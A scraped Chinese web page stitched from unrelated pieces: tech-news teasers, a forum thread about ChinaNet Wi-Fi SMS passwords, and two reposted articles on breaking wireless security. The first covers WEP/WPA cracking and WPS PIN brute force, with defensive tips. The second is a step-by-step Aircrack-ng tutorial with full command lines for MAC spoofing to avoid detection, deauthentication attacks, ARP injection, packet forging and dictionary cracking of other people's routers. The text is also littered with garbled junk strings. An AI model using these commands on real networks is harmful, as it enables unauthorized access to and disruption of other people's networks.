怎么如何获得office密钥chinanet-A8F5密钥

一转眼就到了7月份,炙热的夏天需要各种清凉、提神和降暑神器,躲在室内享受游戏当然...
Apple Watch 虽然是去年 9 月发布的可穿戴设备,但直到今年 4 月 24 日,这款果粉期待...
越狱工具发布后第一时间求汉化求翻译的历史已经成为过去,希望未来能延续下去。
有望成为三星之外的首款曲面双侧屏手机,黑莓终于要和三星合作了?
《AppHeads》可以让用户拥有新概念的多任务界面,插件在主屏幕两边显示多款应用的图标...
在强悍的iPhone 6s面前,iPhone 6c要怎么样才能吸引消费者的注意力?
让闹钟更给力,起床更容易。
很多迹象开始表明iPhone 6s的量产即将开始,你的钱包准备好了吗?
《动物摔角界》是制作过《EL》《艾米星星射手》等小清新风格手游的日本游戏工作室 Wri...
《武士闪电战》(Samurai Blitz)是本周游戏开发商 Afterlight Collectiv 上线的一款...
由国外工作室 TicToc Games 开发的独立游戏《Adventures of Pip(像素点大冒险)》本...
今日孩之宝公司旗下游戏工作室 Backflip 带来了他们的《特种部队》主题动作打击手游新...
《经理大战狼人》( The Executive )是游戏开发商 Riverman Media 带来的一款格斗手游...
死神掌管着世间万物的生死,但是随着现在生活环境越来越好了,人们的寿命也就越来越长...
身为一个数学白痴,真的很难享受到数学世界的乐趣,但任凭你再讨厌数学,在生活上还是...
论如何用 iPhone 拍出一张好的照片。
我一开始真没想到是这样的。
迪士尼动画几乎部部都是经典,在手游方面也小有建树,那么在移动设备的周边产品方面表...
iPad 秒变 Surface。
一张自拍帅了自己一脸。
Flir推出的最新热成像产品让用户体验了一把成为“铁血战士”的感觉。
不少人都养过宠物,小狗小猫小鱼什么的,说到养鱼,那么肯定要给它们一个好点儿的环境...
iPhone外设的作用范围越来越大,库克看到这种消息,想必也是很开心的。
4S已经联入CHINANET,却无法获得短信密码,这是何因?
注册时间 最后登录
在线时间23 小时 UID
主题帖子人气
青苹果, 积分 69, 距离下一级还需 131 积分
信号没有问题。但却无法收到短信密码,我的WIFI是电信提供的免费30小时的。
注册时间 最后登录
在线时间2027 小时 UID
主题帖子人气
I'll be by your side forever.
没看懂楼主说的神马
注册时间 最后登录
在线时间23 小时 UID
主题帖子人气
呵呵!苹果4无法使用免费的WIFI时长,主要是收不到短信密码,导致无法连接上网络
注册时间 最后登录
在线时间718 小时 UID
主题帖子人气
会不会是飘的信号,满格也是上不去的
注册时间 最后登录
在线时间290 小时 UID
主题帖子人气
Re 2楼(winbing)的帖子
引用2楼winbing于 22:56发表的: 呵呵!苹果4无法使用免费的WIFI时长,主要是收不到短信密码,导致无法连接上网络怎么可能无法使用……cmcc.chinanet.chinaunicom.公交4g网络都可以用……收得到短信的!
威锋旗下产品
Hi~我是威威!
沪ICP备号-1 丨 深公安网监备案号 5
增值电信业务经营许可证:
Powered by Discuz!免费无线上网(电信Wifi-ChinaNet)破解?工具+教_百度文库
两大类热门资源免费畅读
续费一年阅读会员,立省24元!
评价文档:
免费无线上网(电信Wifi-ChinaNet)破解?工具+教
阅读已结束,如果下载本文需要使用
想免费下载本文?
把文档贴到Blog、BBS或个人站等:
普通尺寸(450*500pix)
较大尺寸(630*500pix)
你可能喜欢转PJ无线路由密码,如何保护自己的无线网络和数据安全(随便写写,高手勿进)
目前无线路由有两种加密方法,wep和wpa(wpa和wpa2差不离,下文所述wpa包含wpa和wpa2)。wep其实是一种非常弱的密码,只有一种固定密钥。如果ap信号好,密码很快就PJ能出来,如果data(即ivs)慢,也能采取跑包的方法挂字典猜密码。事实上,win7根本就不认为wep是一种安全措施,在win7中设置点对点的无线网络时,wep和无密码都属于无安全措施的方式。wpa加密方式相对来说安全性较高,PJ也较为不易,但是仍有章可循!wpa加密方式中,用户自定义的固定密钥叫psk,psk和ap的ssid&&用户的ssid以及两个随机数生成ptk,ptk是用户实际上网时的临时密钥。因此PJwpa不能用类似PJwep即通过监听网络获得大量data数据来反编译。目前主流的方法是,抓取客户端同ap首次联系时的四次握手包,然后挂字典暴力PJ,俗称跑包。这是一个猜密码的过程,只不过机器来猜(主要靠显卡),速度比较快,能猜出密码的前提是你的字典里有这个密码。wpa跑包PJ的成功率不高,知名跑包网站gpuhash的PJ成功率仅为20%。但是由于国人对密码设计根本不在意,大部分人都喜欢用规律数字 手机号码 生日姓名等做密码,加之最近新流行的pin码PJ(下详),因此,PJ一个普通人(指普通家庭用户)有wpa密码的路由的成功率,以本人经验认为超过80%(国内wpaPJ)。3 H, g: y6 n' A+ d5 o
, R' J+ _( L9 M; E8 Z6 [1 I; k
& && &&&近日,国外黑客研究出穷举pin码PJ无线路由之方法,制作出reaver工具,并很快流传到国内。经本人实践,在信号强度较好的情况下,pin码PJ成功率是非常高的。pin码PJ的原理是,带wps功能的路由允许网卡跟路由用pin码连接(802.11n的路由即150M速度以上的路由大部分都带wps功能,且默认开启,802.11g的路由即最高速度为54M的路由不带wps功能,从pin码PJ上讲,54M的路由更安全),而路由的pin码普遍都是8位数字,那么,只要穷举这8位数字组合就能PJ此路由了。事实上,需要穷举的组合根本不需要这么多,因为pin码前4位是一个组合,第5-7位是一个组合,最后一位是检验码,穷举过程中可以先穷举前4位,待前4位正确后再穷举中间5-7位,可能的组合也就1共11000种。按照几秒尝试一次pin的速度,整个PJ时间仅需要几小时!而且pin码PJ不需要客户端在线!目前主流的11n的路由(也就是150M速度以上的路由)都带有wps功能,在路由器中显示为qss功能。本人用pin码PJ方式成功PJ一台tplink普通路由以及一台电信ChinaNet-xxxx路由。特别说明,电信的ChinaNet-xxxx路由不是电信ChinaNet(无后缀的那种)热点,所带密码默认都是无规律字母数字组合,用跑包方式PJ的话,就算用天河一号也够呛。可悲的是ChinaNet-xxxx路由PJ后,并不能直接上网,登陆路由后还需要拨号的用户名密码才行!- }&&i6 I# O1 h2 V# I& _5 ~/ e
3 W( Q' N: F) s+ R: [' T
& && &&&路由被PJ后,无线网路中传输的一切信号都可以被嗅探。网络安全就不复存在!作为普通用户,如何保护自己的无线网络和数据安全呢?如何防止被ceng呢?这里提供几个可行的思路和相关反思。1、弃wep用wpa:wep100%的PJ率,用了等于无用。2、隐藏ssid:攻击者使网卡进入监听模式后,是看不到ssid的(只能看见ssid是几位的),但是可以看到mac。攻击者抓取握手包后,用分析工具打开握手包,里面就可以有ap的ssid。因此隐藏ssid对于防止PJ无效。3、mac绑定、mac过滤:攻击者在攻击时可轻易获得合法客户端mac,复制即可。4、关闭dhcp并且修改路由默认ip:如果攻击者发现网络信号质量好却分配不到ip,一般会联想到3和4两种。对于关闭dhcp的路由,用ip端扫描工具即可看到ap所在的网段,一般192.168.*.*& &&&172.16.*.* - 172.31.*.*& &&&10.*.*.* 是常用的地址段。5、小掩码策略:本人认为这是一种隐蔽的防ceng方法,设置好后让路由和唯一的合法客户端在一个网段,其他任何机器无法进入该网段。
1 v7 }' P8 c( v& N5 g- D$ u& k
2 r: `; V/ f0 H- u
- _# F& a( [: ^
A类地址的缺省子网掩码为255.0.0.0,B类为255.255.0.0,C类为255.255.255.0。下表是C类地址子网划分及相关子网掩码:+ G1 n% ?& n3 Q6 s* B4 }' V: C
! ?3 [( Y4 p
子网位数 子网掩码 主机数 可用主机数
1 255.255.255.128 128 126
7 w8 e3 s# u9 J' i8 i2 y
2 255.255.255.192 64 62
6 |; V) g: c( W8 C8 H3 ]
3 255.255.255.224 32 30
7 A* S; h( R# b
4 255.255.255.240 16 14
5 255.255.255.248 8 6
6 255.255.255.252 4 2
255.255.255.252这个子网掩码起到以下作用:如C类地址192.168.1.0这个网段,子网是192.168.1.0-192.168.1..4-192.168.1..8-192.168.1.11……可用的IP是第一个子网192.168.1.1& && &&&192.168.1.2第二个192.168.1.5& && &&&192.168.1.6第三个192.168.1.9……& && &&&图中可知,小掩码的设置方法是路由ip为192.168.1.9,子网掩码为255.255.255.252,合法客户端ip为192.168.1.10,子网掩码为255.255.255.252,网关为192.168.1.9,这样合法客户端和路由间形成了点对点网络,合法客户端在线时,任何其他主机都无法进入该网络。这时路由器的dhcp功能仍可以正常打开(一般路由默认dhcp提供192.168.1.100-192.168.1.199的ip地址池),非法用户这时候只能是无头苍蝇,能被分配到ip,却上不了网登不去路由。6、关于密码设计:尽量不用生日、电话、姓名、合法英文单词、键盘顺序、低于10位的纯数字,作为密码或者密码组合项。(CSDN杯我最喜爱的CSDN密码评选:ppnn13%dkstFeb.1st(娉娉袅袅十三余,豆蔻梢头二月初)hanshansi.location()!∈[gusucity](姑苏城外寒山寺)hold?fish:palm(鱼和熊掌不可兼得)FLZX3000cY4yhx9day (飞流直下三千尺,疑似银河下九天)tcmlflw,syred&Febhua(停车XX枫林晚,霜叶红于二月花)。如果你的帐号在最近的各大网站泄露门中已经能查询到,那么你的路由切不可再用相同的密码了,因为相关数据已经制作成字典供黑客使用。7、修改你的路由器默认登陆密码,虽然防止不了ceng,但是可以防止乱改路由设置。8、关闭路由器的wps功能,即qss功能,可以杜绝穷举pin码PJ。
原地址 thhp://blog.csdn.net/ffilman/article/details/5782577
本文主要是针对无线网络的密码PJ,使用平台 linux 2.26.21.5 ,实现环境 BACKTRACK 3 FINAL(USB),无线PJ工具 Aircrack-ng ,Aircrack-ng系列工具也有windows 平台版本,但是本人的小黑的始终不能在win下抓包,所以只能 弃 win 从 lin 了,另外 win 下扫描到的 AP 也比 lin 下少了很多。其实 WIN 并不完整的支持 TCP/IP 协议族,有些协议 win 直接丢弃不用。网络本来从一开始就是 unix 的天下,win 只是在后来加入了网络的功能。
&&K) |& @4 K+ U
Aircrack-ng工具包有很多工具,我用到的工具主要有以下几个:
airmon-ng 处理网卡工作模式. ^& Y1 u+ y' R& w# ~8 u8 ^
airodump-ng 抓包& S5 R. l5 N* h+ y&&g* }- X& y
aircrack-ng PJ( i- |&&~&&~0 {, R6 h) w! j' x
aireplay-ng 发包,干扰
另外还要用到以下 linux 命令:# n. }0 |( ^- K7 Y
ifconfig 查看修改网卡状态和参数
macchanger 伪造 MAC
iwconfig 主要针对无线网卡的工具 (同 ifconfig)! `8 k6 N; {7 w4 Y3 v% K+ _( e7 i
iwlist 获取无线网络的更详细信息
另外还有其他的 linux 基本命令,我就不提示了。( W. v% J4 E&&Q
& \1 e2 {) E. l# _' I
具体PJ步骤:
1. 修改无线网卡状态:先 down 掉
2. 伪造无线网卡的 MAC 地址:安全起见,减少被抓到的可能
3. 修改网卡工作模式:进入Monitor状态,会产生一个虚拟的网卡
4. 修改无线网卡状态: up
5. 查看网络状态,记录下 AP 的 MAC 和本机的 MAC ,确定攻击目标
6. 监听抓包:生成 .cap 或 .ivs/ }9 n' Y; `& ]0 X3 U
7. 干扰无线网络:截取无线数据包,发送垃圾数据包,用来获得更多的有效数据包
8. PJ .cap 或 .ivs ,获得 WEP 密码,完成PJ* `+ c5 v( f6 S1 ]
' ~: r: Y1 v' A1 K% s& c
下面详细介绍一下各个命令的基本用法(参照命令的英文说明)
1. ifconfig
用来配置网卡,我们这里主要用来 禁用和启用 网卡:3 ~3 k2 O+ [% B2 J3 K: Y- C( `
ifconfig ath0 down& V5 H; r3 i8 y&&\1 Q8 v7 k+ @* K
ifconfig ath0 up
禁用一下网卡的目的是为了下一步修改 MAC 。/ t2 }' O. E5 V4 ?6 L
4 o0 ^# y9 E; C/ p9 {
2.macchanger
用来改变网卡的 MAC 地址,具体用法如下:3 A$ j: l6 a+ g# ]8 s& S
usage: macchanger [options] device
-h 显示帮助5 n% h- v0 D+ r2 ~) q$ i. i# O
-V 显示版本
-s 显示当前MAC
-e 不改变mac,使用硬件厂商写入的MAC& S& K9 H* Q& M
-a 自动生成一个同类型的MAC,同厂商的
-A 自动生成一个不同类型的MAC,不同厂商的6 D- r+ v$ T( C- E3 |. N
-r 生成任意MAC% D; r9 K) a- n
-l 显示已知厂商的网卡MAC地址分配,这个很有用,可以根据MAC查出来是哪个厂商生产的产品
-m 设置一个自定义的MAC 如: macchanger --mac=00:34:00:00:00:00 ath0 。' R) ?, X3 k5 \
( g+ P1 t2 W4 t( F
3.airmon-ng
启动无线网卡进入 Monitor 模式,, [- S% q8 p3 S/ N9 ~
useage: airmon-ng &start|stop|check& &interface& [channel]2 N&&|/ [2 ~6 U' m& I
&start|stop|check& 启动,停止,检测
&interface& 指定无线网卡- a+ J1 s/ R3 H) M' @
[channel] 监听频道,现代大多数无线路由默认是 6,随便扫描一下都是这个频道,网管们应该换换了
+ D' i7 N! R' `& J/ B9 k
4.iwconfig. w, R+ k9 P$ n6 _; ~3 O
专用的无线网卡配置工具,用来配置特殊的网络信息,不带参数时显示可用网络。
useage:iwconfig interface [options]
[essid{NN|ON|OFF}] 指定essid号 开启关闭2 m- u7 c& o' p- z# J
[nwid{NN|on|off}] 指定网络id号 开启关闭% y+ F4 Y; s+ \, Z- I- I
[mode {managed|ad-hoc|....}] 指定无线网络工作模式/类型
[freq N.NNNN[K|M|G]] 指定工作频率7 I( P& V! s( b8 x7 N0 e! S5 D
[channel N] 指定频道( A9 u* F( [; S* b9 t. q& m
[ap {N|off|auto}] 指定AP号 关闭/自动
[sens N] sens 号& `' p. P7 a0 A&&B9 Z
[nick N] nick 号
[rate {N|auto|fixed}] 速率控制9 a: S8 Y3 ?1 y2 ]
[rts {N|auto|fixed|off}] rts控制,如果不知道什么是RTS,那就回去好好去学网络,不用往下看了
[frag {N|auto|fixed|off}] 碎片控制4 o6 C1 p! X5 u5 X3 k
[enc {NNNN-NNNN|off}] 范围
[power {period N|timeout N}] 电源 频率/超时
[retry {limit N|lifetime N}] 重试 限次/超时
[txpower N{mw|dBm}] 功率 毫瓦/分贝
[commit] 处理
& b# [& T4 G& ]' ?1 I
主要用来显示无线网卡的一些附加信息,同上
useage: iwlist [interface] options; g1 w4 k6 c4 c3 P7 J5 p0 r9 m/ d3 p
scanning 扫描3 P&&N/ j' ^: l3 J( ]9 I0 U
frequency 频率
channel 频道
bitrate 速率
rate 速率, l7 `4 P& Z! V- _
encryption 加密8 R. P& P& |& U7 A
key 密钥5 T& {3 u1 ~/ H: C) H) W
power 电源
txpower 功率/ B9 ^6 H7 I4 L+ Y0 s% F& H
accespoints ap
peers 直连
event 事件
6.airodump-ng6 t2 A&&r0 C' l4 O; @2 L& ~
抓包工具,我最喜欢用的,详细用法如下:, h&&R2 T2 I) k5 a6 |
usage: airodump-ng &options& &interface&[,&interface&,...]( F1 Z! e2 N9 ]/ j% a' D
Options:& h9 O2 \( d! h
--ivs :仅将抓取信息保存为 .ivs
--gpsd :使用 GPSd&&}- E& R+ E&&H
--write &prefix& :保存为指定日文件名,我一般用这个,尤其是多个网络时,指定了也好区分( s/ j3 Q0 w! t: x, P' k- r
-w :同 --write
--beacons :保存所有的 beacons ,默认情况况下是丢弃那些无用的数据包的4 V( C6 J&&K# j8 K9 ]& K
--update &secs& :显示更新延迟,没有用过&&@% R: Q0 M% X& X
--showack :显示ack/cts/rts状态,还是那句,不知道rts就不用看了
-h :隐藏已知的,配合上面的选项使用
-f &msecs& :跳频时间
--berlin &secs& :无数据包接收时延迟显示的时间,这句不太好翻译,意思是当那个信号发出设备没有发出数据包多少时间之后,就停止对它的监视.默认120秒.建议学好英文去读原文,翻 译的都会有出入,这是我的理解.(mhy_mhy注)
-r &file& :从指定的文件读取数据包.我也想有人给我抓好包放哪里,呵呵4 i& s' \8 R3 @' w
Filter options:0 t4 I- A& c$ g: V7 j5 I7 i& u
--encrypt &suite& : 使用密码序列过滤 AP
--netmask &netmask& : 使用掩码过滤 AP
--bssid &bssid& : 使用 bssid 过滤 AP& w' Z$ f/ S& o! S&&z8 ^9 H& U- D
-a : 过滤无关的客户端1 M5 Y) I' U% Y' u: H
默认情况下使用2.4Ghz,你也可以指定其他的频率,通过以下命令操作:: X( i# ~9 K8 c2 M- B6 k1 N
' T3 |* m. `1 n1 N& a+ ?( K
--channel &channels&:指定频道' r, i1 C' s3 J; b! e* J8 ?3 S
--band &abg& :制定带宽
-C &frequencies& :指定频率MHz
--cswitch &method& : 设置频道交换方式5 m) p6 _6 g4 r$ Z+ M! j
0 : FIFO (default) 先进先出(默认)
1 : Round Robin 循环: R& O& Q8 `. ?
2 : Hop on last 最后一跳
--help : 显示使用方法,翻译到这里,感觉还是英文的贴切一点,建议读原文
: @5 ^* X% T( \
7 R# \& p$ k4 e
7.aireplay-ng
6 ^& C# ]/ R2 H6 b, ?3 I
搞破坏的工具,注意杀伤力很大,甚至可以损坏劣质的 AP 设备(小内存的路由器可能会重启,或者彻底被破坏掉),我很喜欢这个东西,相信你也会喜欢的,使用时注意分寸.
usage: aireplay-ng &options& &replay interface&
Filter options:& ^3 f( ?, a$ a8 u, P2 n. ~$ D( W
3 H5 d4 x& J4 ^
-b bssid : AP的 MAC4 K# ^&&Q0 {$ y7 L
-d dmac : 目标的 MAC. u( ?&&s& Z1 K
-s smac : 来源的 MAC: A+ {. Q+ p4 s* r
-m len : 最小包长度2 Z$ D4 o& O# I. H* `6 R2 v- L
-n len : 最大包长度
-u type : 帧控制, type field( {&&Q3 S3 F&&j( _9 D4 ~
-v subt : 帧控制, subtype field
-t tods : 帧控制, To DS bit
-f fromds : 帧控制, From DS bit
-w iswep : 帧控制, WEP bit
-D : 禁用 AP 发现功能
' n# M6 R, M& B
Replay options:
-x nbpps : 每秒包数量4 v4 g3 i6 T3 l/ Y
-p fctrl : 框架设定 (hex)
-a bssid : 设置AP的 mac
-c dmac : 设置目标的 MAC+ W. h1 N+ T: o: o& l9 p! T8 j&&f7 V
-h smac : 设置来源的 mac
-g value : 改变环缓存大小 (默认8)
-F : 选择第一个匹配的包
2 C2 i0 U' c, A! q4 Z& ^&&w
Fakeauth attack options:( s( g/ S( D7 ]; a7 b) M% U3 J
! H3 c/ v4 T7 P
-e essid : 设置目标 AP 的 SSID
-o npckts : 每秒爆破的包数量 (0 自动, 默认 1)8 d: [* b3 k! ]0 ^: e# D
-q sec : 存活时间秒
-y prga : 共享可信的 key流
+ J7 F- K2 |/ d9 B! w
Arp Replay attack options:
-j : 注入 fromDS 数据包,还没有用过这个选项- f& L8 R' R, A+ K
Fragmentation attack options:
-k IP : 设置目的IP 碎片) X7 j2 y* w+ K
-l IP : 设置源IP碎片
4 G( i9 u8 Z; L5 }: S1 Z
Test attack options:
-B : 激活 bitrate 测试0 |% Q& Z1 V+ I. [. N
; S* \5 K* M# ~, O3 ^( U8 _
source options:
-i iface : 设置抓包的接口设备( Y: V1 t6 Q, N8 A& ~
-r file : 从pcap文件析取数据包
attack modes (Numbers can still be used): 攻击模式,最具杀伤力的地方
--deauth count : 不信任一切 (-0)&&e* Y4 c+ ?+ L&&e( }) ]
--fakeauth delay : 欺骗AP的信任 (-1)
--interactive : 交互的选择 (-2)5 D! c( j7 N; U( O4 x
--arpreplay : 标准的 ARP-request replay (-3)
--chopchop : 解密 WEP 包 (-4)2 t0 O2 s. ?# E8 F2 y! p0 Z
--fragment : 生成有效的 key流 (-5)+ N: o) M&&n2 c2 I/ y: N& _3 Q
--caffe-latte : 从客户端获取新的 IVs (-6)( }3 X3 q3 V2 ]# l& v: B! v
--cfrag : 对客户端进行碎片攻击 (-7)( w5 q* H9 X1 V& S/ N( b! E0 d&&f
--test : 测试注射及效果 (-9). D8 z2 @&&{+ D4 R& Q0 C3 o
--help : 显示这个帮助,这部分是全部依照我的使用来翻译,没有完全准确的翻译,主要对付 那些不给出作者就引用的人,鄙视抄袭.. n) @3 ]+ N* j& U- L0 M
8.aircrack-ng
PJKEY,漫长的过程.漫不漫长取决于两个方面: 一是网管的聪明程度(能否设置出复杂的密码),二是电脑的速度.
9 B, i: c% k5 ]# j
usage: aircrack-ng [options] &.cap / .ivs file(s)&; L1 Z4 w7 t8 _( w, t7 L
Common options:9 j- `$ Z- O0 m% s$ e& y9 v# L# D
-a &amode& : 暴破 (1/WEP, 2/WPA-PSK)6 Z5 K; q) x1 m4 E
-e &essid& : 选择 essid 为目标2 Z8 H# o& b& l
-b &bssid& : 选择 ap的 mac 为目标,就是PJ识别的关键字
-q : 使用安静模式,无数出模式
-C &macs& : 将所有的 AP 合并为一个虚拟的5 N7 [5 t# g& L7 B&&D$ E
&&t# P+ {5 Y/ i+ o' j
Static WEP cracking options:
-c : 仅搜索字母数字# M4 {0 H& K0 w+ d3 c7 ^' P3 v0 [
-t : 仅搜索二进制8 \# p2 q1 h4 }7 _9 C, z. U
-h : 搜索数字关键字 (用于坏掉的部分),翻译不出来了3 _7 g# _. p8 K2 ^
-d &mask& : 指定掩码(A1:XX:CF:YY)
-m &maddr& : 用 MAC 匹配可用的数据包
-n &nbits& : WEP 长度 64/128/152/256/512) h. Z$ |. b! {; |$ v/ Y# ]* b
-i &index& : WEP 索引(1 to 4), default: any) x5 T0 b) x' R& J1 _. N
-f &fudge& : 暴破强度 默认2,原文字面意思是&禽兽强迫 捏造事实&,呵呵
-k &korek& : 禁用一种PJ方式 (1 to 17)8 P& h- F1 k0 E, p$ q$ U
-x or -x0 : 禁用最新关键字暴破( |0 [1 h9 l# e( [0 r
-x1 : 使用最新关键字暴破 默认( i7 r. t( J1 l0 p9 Q5 ^! }
-x2 : 用最新两个字节暴破' R: n2 h+ j3 N) i2 z0 a3 I
-y : 实验单线程模式
-K : KoreK 攻击 (pre-PTW)
-s : 显示为 ASCII% G- ?1 s1 R0 ]0 R- p& Q
-M &num& : 最大数量 ivs 使用& y2 n8 Z1 `2 [- e0 _&&h! ~8 o
-D : WEP 非隐蔽模式/ ~5 j8 I4 o# h8 n+ d
-P &num& : PTW debug: 1 disable Klein, 2 PTW! H) H; O& k+ y1 Y
-1 : 尝试一次 PTW1 o$ U9 a4 [& G
WEP and WPA-PSK cracking options:
-w &words& : 指定目录文件,可以多个
-r &DB& : 制定 airolib-ng 数据库,不能和 -w 一起使用# d$ P5 {4 T! J* z' |4 j
--help : 显示这个帮助, E: J& S! a6 h7 \4 k$ }
+ P9 u: Z1 o. G2 [* ~4 {3 P
/ r7 h* y4 N+ `$ o
好了,用法都解释完了,主要是后面这三个命令,这是我从英文译过来的,结合我的使用情况,以及我的理解.参数全,没有漏掉任何一项,可能我是第一个把这个完整翻译过来的,之前我没有找到有翻译好的,有些地方并不是准确的遵循原文,希望感兴趣的朋友在转载的时候注上我:mhy_mhy.
! D9 Z( V9 @7 j$ ~0 `
# _0 V: Z; Q0 f3 W& q
下面以我的硬件实例来操作一下:
我的硬件是 atheros 的 a/b/g 无线网卡,在 linux 中显示为 ath0 ,我只列出我常用的命令步骤,不再做任何解释:3 T- P( v& c- \. V+ x( Q0 l
$ G+ T& T) ^) C$ A! l
ifconfig ath0 down&&c% v( `&&E4 T
macchanger -r ath0
macchanger -r wifi0
ifconfig ath1 up
airmon-ng start ath1 6' i+ w/ {# ?! i' Y
iwconfig ath1
iwlist ath1 scanning- |2 X&&p! ~7 u
airodump-ng -w *.cap -c 6 ath1
( X& A6 w9 ?/ Y3 o7 W5 H
aireplay-ng -1 0 -e ap_essid -a ap_mac -h XXXXXXXXXX ath1
aireplay-ng -5 -b ap_mac -h XXXXXXXXXX ath1, x& p0 J' D9 ]8 I& G) ]8 O
aireplay-ng -3 -b ap_mac -h XXXXXXXXXX -x 1024 ath11 F0 D8 \( O( g( m4 L% ?0 s( A7 I
aireplay-ng -0 1 -a 00:00:00:00:00:00 -c BB:BB:BB:BB:BB:BB ath17 ]4 O) O2 v! v$ i' N
aireplay-ng -3 -b &AP MAC& -h &my MAC& -i ath1
. J' j0 j( Z& D& U; X
aircrack-ng -x -f 2 *.cap
aircrack-ng -w passdict.txt *.cap
aircrack-ng -n 64 -b apmac *.ivs7 R&&O% {5 J( \% w& P* a9 u2 k
aircrack-ng -w passdict.txt -b 00:00:00:00:00:00 *.cap
Aireplay-ng 的 6 种攻击模式详解$ {0 ^: J: k, A
-0 Deautenticate 冲突模式
使已经连接的合法客户端强制断开与路由端的连接,使其重新连接。在重新连接过程中获得验证数据包,从而产生有效 ARPrequest。
如果一个客户端连在路由端上,但是没有人上网以产生有效数据,此时,即使用-3也无法产生有效 ARP request。所以此时需要用-0 攻击模式配合,-3 攻击才会被立刻激活。6 Q' L&&t# y* T
aireplay-ng -0 10 –a&ap mac& -c &mymac& wifi0 参数说明:) o3 ]- ]; g&&H&&B
【-0】:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网)&&W# g& M+ z) I$ ?
【-a】:设置 ap 的 mac
【-c】:设置已连接的合法客户端的 mac。
如果不设置-c,则断开所有和 ap 连接的合法客户端。* h&&Z, o7 G4 L6 n8 m5 M
aireplay-ng -3 -b &apmac& -h &my mac&wifi0
注:使用此攻击模式的前提是必须有通过认证的合法的客户端连接到路由器6 u! T, [% N% w- w& h&&N
-1 fakeauth count 伪装客户端连接- X& d' x7 q$ F0 R- y8 m1 C
这种模式是伪装一个客户端和 AP 进行连接。& Q' ]4 K0 Z) a3 D# e0 y
这步是无客户端的研究学习的第一步,因为是无合法连接的客户端,因此需要一个伪装客户端来和路由器相连。为让 AP接受数据包,必须使自己的网卡和 AP 关联。如果没有关联的话,目标 AP 将忽略所有从你网卡发送的数据包,IVS数据将不会产生。
用-1伪装客户端成功连接以后才能发送注入命令,让路由器接受到注入命令后才可反馈数据从而产生 ARP 包。
aireplay-ng -1 0 –e&ap essid& -a &apmac& -h &my mac&wifi0
参数说明:
【-1】:伪装客户端连接模式,后面跟延时& ~% w5 M' Y7 y- Y5 S2 A5 z# R
【-e】:设置 ap 的 essid6 G: `5 f2 i* i- j
【-a】:设置 ap 的 mac
【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)
-2 Interactive 交互模式; n! ?6 ]8 W0 s( d3 `9 I
这种攻击模式是一个抓包和提数据发攻击包,三种集合一起的模式! \&&m- \) t: M& _) i9 f
1.这种模式主要用于研究学习无客户端,先用-1建立虚假客户端连接然后直接发包攻击 ,
aireplay-ng -2 -p 0841 -cff:ff:ff:ff:ff:ff -b &ap mac& -h&my mac& wifi0
参数说明:; Q&&k7 l* d# X
【-2】:交互攻击模式
【-p】:设置控制帧中包含的信息(16 进制),默认采用0841- g/ A( d! [( l
【-c】:设置目标 mac 地址
【-b】:设置 ap 的 mac 地址
【-h】:设置伪装客户端的网卡 MAC(即自己网卡 mac)2 Z1 M; `5 X+ S2 p3 }
2.提取包,发送注入数据包 aireplay-ng -2 –r&file& -x 1024 wifi0 发包攻击.其中,-x 1024是限定发包速度,避免网卡死机,可以选择 1024。
-3 ARP-request 注入攻击模式8 y( B&&\. F( h1 w* Q# f
这种模式是一种抓包后分析重发的过程这种攻击模式很有效。既可以利用合法客户端,也可以配合-1 利用虚拟连接的伪装客户端。如果有合法客户端那一般需要等几分钟,让合法客户端和ap 之间通信,少量数据就可产生有效 ARP request 才可利用-3模式注入成功。如果没有任何通信存在,不能得到 ARPrequest.,则这种攻击就会失败。- R# Z9 K0 e+ d# ], b& `. d7 z8 z
如果合法客户端和ap之间长时间内没有 ARPrequest,可以尝试同时使用-0 攻击. 如果没有合法客户端,则可以利用-1建立虚拟连接的伪装客户端,连接过程中获得验证数据包,从而产生有效 ARP request。再通过-3 模式注入。
aireplay-ng -3 -b &apmac& -h &my mac& -x512 wifi08 b/ z4 [& t) c6 \0 M5 Q3 D( G
参数说明:
【-3】:arp 注入攻击模式
【-b】:设置 ap 的 mac
【-h】:设置
【-x】:定义每秒发送数据户包的数量,但是最高不超过 1024,建议使用512(也可不定义)
-4 Chopchop 攻击模式/ n/ R, \/ B+ }+ z1 }
用以获得一个包含密钥数据的 xor 文件这种模式主要是获得一个可利用包含密钥数据的 xor文件,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。
aireplay-ng -4 -b &apmac& -h &my mac& wifi0参数说明:
【-b】:设置需要研究学习的 AP 的 mac# e& c' D! L; p+ v
【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)
-5 fragment 碎片包攻击模式
用以获得 PRGA(包含密钥的后缀为 xor 的文件)这种模式主要是获得一个可利用 PRGA,这里的 PRGA 并不是 wep key数据,不能用来解密数据包。而是用它来产生一个新的数据包以便我们可以进行注入。其工作原理就是使目标 AP 重新广播包,当 AP重广播时,一个新的 IVS 将产生,我们就是利用这个来研究学习 !
aireplay-ng -5 -b &apmac& -h &my mac&wifi0: l! r6 r! `6 q&&y, m
【-5】:碎片包攻击模式
【-b】:设置 ap 的 mac
【-h】:设置虚拟伪装连接的 mac(即自己网卡的 mac)
Packetforge-ng:数据包制造程序 Packetforge-ng&mode&&options&Mode
【-0】:伪造 ARP 包
packetforge-ng -0 -a&ap mac& -h &mymac& wifi0 –k 255.255.255.255 -l255.255.255.255–y&.xor file& -wmrarp0 b8 F: x7 q! m
参数说明:2 g& r- g, T2 J/ l, w
【-0】:伪装 arp 数据包
【-a】:设置 ap 的 mac
【-h】设置虚拟伪装连接的 mac(即自己的 mac)* ^, Z8 D0 w& ^) p&&w
【-k】&ip[:port]&说明:设置目标文件 IP 和端口& U$ F1 g1 p& O2 ^( L
【-l】&ip[:port]&说明:设置源文件 IP 和端口
【-y】&file&说明:从 xor 文件中读取 PRGA。后面跟 xor的文件名。2 p# |& f4 `9 o6 y8 A3 W
【-w】设置伪装的 arp 包的文件名 Aircrack-ng:WEP 及WPA-PSK key 研究学习主程序7 X$ b* s& v, G7 ^% V) ^& r
Aircrack-ng [optin]&.cap/.ivs file&Optin aircrack-ng -n64 -b &ap mac& name-01.ivs )
参数说明:1 m2 w, {' _6 p6 |7 M
【-n】:设置 WEP KEY长度(64/128/152/256/512)aircrack-ng -x -f 2 name-01h.cap+ P* K3 }4 I+ l0 \$ [
参数说明:
【-x】:设置为暴力研究学习模式
【-f】:设置复杂程度,wep 密码设置为 1,wpa 密码设置为 2aircrack-ng -w password.txt ciw.cap. ~&&k8 F&&K+ \
